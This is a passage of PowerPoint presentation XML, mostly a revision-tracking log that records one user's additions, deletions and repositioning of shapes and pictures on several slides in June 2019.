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9" r:id="rId4"/>
    <p:sldId id="271" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="259" r:id="rId8"/>
    <p:sldId id="267" r:id="rId9"/>
    <p:sldId id="261" r:id="rId10"/>
    <p:sldId id="273" r:id="rId11"/>
    <p:sldId id="272" r:id="rId12"/>
    <p:sldId id="263" r:id="rId13"/>
    <p:sldId id="277" r:id="rId14"/>
    <p:sldId id="278" r:id="rId15"/>
    <p:sldId id="274" r:id="rId16"/>
    <p:sldId id="279" r:id="rId17"/>
    <p:sldId id="280" r:id="rId18"/>
    <p:sldId id="270" r:id="rId19"/>
    <p:sldId id="268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680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" v="9" dt="2019-06-06T00:16:14.218"/>
    <p1510:client id="{12439EB3-779D-4419-A38F-131004D551F1}" v="552" dt="2019-06-05T21:52:36.263"/>
    <p1510:client id="{2430A73D-447E-FD55-D35E-B0E931B61F9F}" v="5" dt="2019-06-07T12:51:19.311"/>
    <p1510:client id="{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" v="5" dt="2019-06-08T05:39:07.585"/>
    <p1510:client id="{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" v="5" dt="2019-06-07T20:51:26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ksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}"/>
    <pc:docChg chg="addSld modSld sldOrd">
      <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:54:40.517" v="384"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:53:44.985" v="383" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2886590775" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:53:44.923" v="382" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="10" creationId="{966440A0-F4F2-4001-9BE7-5D9C213C4A63}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:53:44.985" v="383" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:picMk id="3" creationId="{11A04154-1CF5-4A38-94F5-FC113118B015}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:53:44.845" v="381" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:picMk id="12" creationId="{BF32AE0D-B7AE-426A-9C18-F0F7D968D5AD}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:50:10.296" v="372" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:picMk id="16" creationId="{8FA16736-F18A-4D55-B938-BABCB3200D9A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:08:40.326" v="10"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2809929173" sldId="259"/>
        </pc:sldMkLst>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:08:40.326" v="10"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:picMk id="5" creationId="{3B9B8637-D83B-453E-B34A-96643D7F6E13}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:08:37.623" v="9"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:picMk id="11" creationId="{92861C8E-BA26-47B9-97F5-CC8F357BA139}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:32:43.992" v="254" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1727781075" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:19:46.299" v="100" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="2" creationId="{11B2CB23-0A51-4BE0-B46E-1691D22EDCA5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:30:26.366" v="239" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="3" creationId="{2E57E17D-B5F0-46C7-9504-7C20ABA2E4F1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:16:32.266" v="41"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="4" creationId="{738ABD5B-44C3-4BF8-9232-2B17C43E1C9D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:16:28.657" v="40"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="5" creationId="{6AA73F9F-6A4A-4B5C-8355-CDB1E8885A7C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:17:29.923" v="51"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="6" creationId="{81DFE1AE-A13A-4DAC-9A43-B1A285A26948}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:30:31.038" v="240" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="8" creationId="{EAED0E72-3541-4D37-A401-07C1928B30C1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:32:43.992" v="254" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="9" creationId="{6E0C3F27-73B3-48AE-BBCD-70A51E0AB1A5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:24:49.270" v="146"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:picMk id="7" creationId="{4FA8F82E-35D7-4541-B455-2A0E171F27B3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:27:36.959" v="164" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:picMk id="10" creationId="{BBBA3F5F-8426-450E-8218-E827C3B91180}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:26:42.411" v="158" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:picMk id="12" creationId="{F2AF1492-F1F3-4214-B561-84F350562436}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:15:22.188" v="37" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3166696917" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:15:22.188" v="37" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="5" creationId="{1DE49EDD-5B9B-4D58-A59C-1EB2AD01E945}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new ord">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:15:54.735" v="38"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="187454225" sldId="272"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:08:47.248" v="11"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="187454225" sldId="272"/>
            <ac:spMk id="3" creationId="{D03E58EE-9F24-4A00-97BB-58FAD58380A2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:10:12.295" v="18"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="187454225" sldId="272"/>
            <ac:picMk id="4" creationId="{19592B5A-AEE0-4E86-B0C8-D6C275A8DD11}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:42:12.293" v="266" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3138890788" sldId="273"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:13:51.265" v="22" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3138890788" sldId="273"/>
            <ac:spMk id="2" creationId="{911EAF35-35B3-4748-9A34-248AEADE3DE3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:14:27.515" v="31"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3138890788" sldId="273"/>
            <ac:spMk id="3" creationId="{7DB8D846-EFFC-4514-8752-CA92E6DF1567}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:17:25.064" v="50"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3138890788" sldId="273"/>
            <ac:spMk id="5" creationId="{244AF56E-75F6-48E0-A381-EE1A07306405}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:41:03.699" v="258" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3138890788" sldId="273"/>
            <ac:picMk id="6" creationId="{4FCDD262-2B46-4696-8B6E-DC303E4D50DA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:42:12.293" v="266" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3138890788" sldId="273"/>
            <ac:picMk id="8" creationId="{5E921C77-D729-4A41-B27B-4CC266801589}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:48:21.998" v="362" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2424753208" sldId="274"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:13:55.531" v="25" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2424753208" sldId="274"/>
            <ac:spMk id="2" creationId="{56408B81-C44F-406A-80B8-27F6857AF5E7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:14:39.500" v="33"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2424753208" sldId="274"/>
            <ac:spMk id="3" creationId="{FB176573-E4D6-4359-B902-D7726007D005}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:14:47.766" v="35" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2424753208" sldId="274"/>
            <ac:spMk id="5" creationId="{ADE71A40-4AFF-41DA-AB27-31FED0BF771F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:46:37.638" v="279" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2424753208" sldId="274"/>
            <ac:spMk id="8" creationId="{E5E53988-9E9F-474E-A554-F7132030E8C8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:48:21.998" v="362" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2424753208" sldId="274"/>
            <ac:spMk id="9" creationId="{FACF7405-240D-4555-A361-C4D79B5248B7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:48:10.123" v="347"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2424753208" sldId="274"/>
            <ac:spMk id="10" creationId="{03934AC9-1501-490F-990E-B90FA908C14F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:43:54.715" v="271" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2424753208" sldId="274"/>
            <ac:picMk id="6" creationId="{CE12BD29-D35F-4EAD-904B-825F25B1CF87}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:17:17.204" v="49"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3283856840" sldId="275"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:13:59.547" v="28" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3283856840" sldId="275"/>
            <ac:spMk id="2" creationId="{D2F8359D-6713-414D-8458-C12B7B84A5EF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:14:35.312" v="32"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3283856840" sldId="275"/>
            <ac:spMk id="3" creationId="{55351FD1-1B6B-4743-A396-57CFB3720103}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:17:01.626" v="47"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3283856840" sldId="275"/>
            <ac:spMk id="4" creationId="{9E104501-0182-46E5-9561-79CA9503DCBC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:17:17.204" v="49"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3283856840" sldId="275"/>
            <ac:spMk id="6" creationId="{453623A4-5272-4389-8DFE-CB21E6F53BF1}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp new">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:54:40.517" v="384"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2376567192" sldId="276"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:41:29.839" v="262"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2376567192" sldId="276"/>
            <ac:spMk id="3" creationId="{24B09F3C-7D1D-4C68-A8AE-BE37438680C7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:54:40.517" v="384"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2376567192" sldId="276"/>
            <ac:spMk id="5" creationId="{B07F7F85-9181-4392-9B16-7C0A779A05D0}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp new">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:48:42.749" v="366"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4092184199" sldId="277"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{BF628575-888C-2960-B5F2-D31D5CC4B1B3}" dt="2019-06-07T20:48:42.749" v="366"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4092184199" sldId="277"/>
            <ac:spMk id="3" creationId="{A11EDE29-0909-4864-8184-994003481610}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{9A8D6C2D-ED3D-4F07-13FF-4EC5EC3972BB}"/>
    <pc:docChg chg="addSld modSld">
      <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{9A8D6C2D-ED3D-4F07-13FF-4EC5EC3972BB}" dt="2019-06-04T20:35:17.916" v="752" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{9A8D6C2D-ED3D-4F07-13FF-4EC5EC3972BB}" dt="2019-06-04T20:35:15.572" v="750" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1838342288" sldId="269"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{9A8D6C2D-ED3D-4F07-13FF-4EC5EC3972BB}" dt="2019-06-04T20:27:21.757" v="74" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="2" creationId="{E71800C3-274A-4D60-B368-42CD7B7F4CA4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{9A8D6C2D-ED3D-4F07-13FF-4EC5EC3972BB}" dt="2019-06-04T20:27:26.834" v="77"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="3" creationId="{9CEE06B5-A14F-4C7C-9E7D-EEDCD7DA3721}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{9A8D6C2D-ED3D-4F07-13FF-4EC5EC3972BB}" dt="2019-06-04T20:27:32.163" v="79"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
